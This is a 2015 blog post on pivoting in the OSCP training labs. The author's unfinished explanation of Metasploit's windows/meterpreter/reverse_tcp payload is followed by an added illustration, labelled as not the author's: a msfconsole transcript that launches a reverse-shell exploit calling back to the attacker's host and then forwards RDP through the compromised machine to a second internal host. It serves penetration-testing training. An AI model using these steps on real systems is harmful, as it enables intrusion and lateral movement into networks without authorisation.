Thursday, September 24, 2015

Quick pivoting lesson

UPDATE 2/9/2016:

I was never able to finish this, and I lost the screen captures from when I was accessing the set of VMs I used for this tutorial. I have since found a better tutorial than my own here:

https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/

Sorry about that!

So I have been playing around in the OSCP labs, and as you may have heard, pivoting into different boxes becomes key as you "unlock" different parts of the network. As someone who doesn't pivot too often (I experiment with and test applications and setups; pivoting is more of a Red Team tactic), this became quite confusing after a while, so I did a brain dump for myself. I decided to share it with you as well.

Let's begin:

So you need some sort of access to the box. In the example I have provided, I have escalated to SYSTEM privileges; however, I was able to pivot using the Meterpreter "portfwd" command on a box where I only had low-level privileges. That said, what I am about to show you may not work; I already had all the screen captures when that idea popped into my head.

First, obtain a reverse Meterpreter session. I did so via HP Power Manager running on port 80:



Next, assign the payload with "set payload windows/meterpreter/reverse_tcp". Breaking that name down into its three parts:

Windows - the target platform; we are exploiting a Windows box
Meterpreter - the stage: what ends up running on the target is the Meterpreter agent, not a plain command shell
Reverse TCP - the stager: the target connects back over TCP to the handler listening on our LHOST/LPORT, so the "callback" must be able to reach us through any firewall or NAT in between

There are many options at each level between the slashes. For instance, if you type windows/ and then hit [TAB], Metasploit lists everything available under windows/, meterpreter being one of them. You can do this after every slash. A second check worth knowing: once you have selected an exploit with "use exploit/...", "show payloads" lists only the payloads compatible with that exploit, which is quicker than tab-completing through the whole tree.

So anyway, once you have executed the exploit and have a session, we can move on to pivoting:
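The original walkthrough stops at this point (see the update at the top). As an added illustration that is not from the post or its lost screen captures, the console transcript below strings together the payload step described above with the Meterpreter "portfwd" command the author mentions pivoting with. Every address, port and module path in it is a placeholder: 10.11.0.5 is assumed to be the attacker's VPN (tun0) address, 10.11.1.20 the first target, and 192.168.10.30 a second-hop host that only the first target can reach; the exploit module is left as a placeholder to be replaced with whatever gave you the foothold.

```text
# Added example transcript, not the author's. All hosts, ports and the
# exploit module are assumed placeholders (see the lead-in above).

# --- msfconsole on the attacking machine ---
msf > use exploit/windows/http/<module_that_gave_you_the_foothold>
# list only the payloads this exploit can carry, then pick the one from the post
msf > show payloads
msf > set payload windows/meterpreter/reverse_tcp
# target of the initial exploit (older Metasploit releases call this RHOST)
msf > set RHOSTS 10.11.1.20
msf > set RPORT 80
# LHOST must be an address the target can route back to; in the labs that is
# the VPN interface, not your LAN address, or the callback never arrives
msf > set LHOST 10.11.0.5
msf > set LPORT 4444
# sanity check every option before firing
msf > show options
# run as a background job so the handler keeps listening for the callback
msf > exploit -j
msf > sessions -l
msf > sessions -i 1

# --- inside the Meterpreter session on the first target ---
# confirm what privilege level you are pivoting from
meterpreter > getuid
# forward local port 3389 on the attacker, through this session, to
# 192.168.10.30:3389 on the second-hop host
meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.10.30
meterpreter > portfwd list
meterpreter > background

# --- a separate shell on the attacking machine ---
# connect to the forwarded port; Meterpreter relays it to the second host
$ xfreerdp /v:127.0.0.1:3389 /u:Administrator

# when done, tear the forward down from the session
meterpreter > portfwd delete -l 3389 -p 3389 -r 192.168.10.30
```

Two points a practitioner would want spelled out: portfwd makes the onward TCP connection from the Meterpreter process on the pivot host, so it needs no elevated privileges there (which matches the author's experience of pivoting from a low-privilege session), and it forwards exactly one local port to one host:port, so each additional service on the second hop needs its own "portfwd add". If "exploit -j" reports the job started but no session ever appears, re-check LHOST before anything else; a handler bound to an address the target cannot reach is the most common reason a reverse_tcp callback fails.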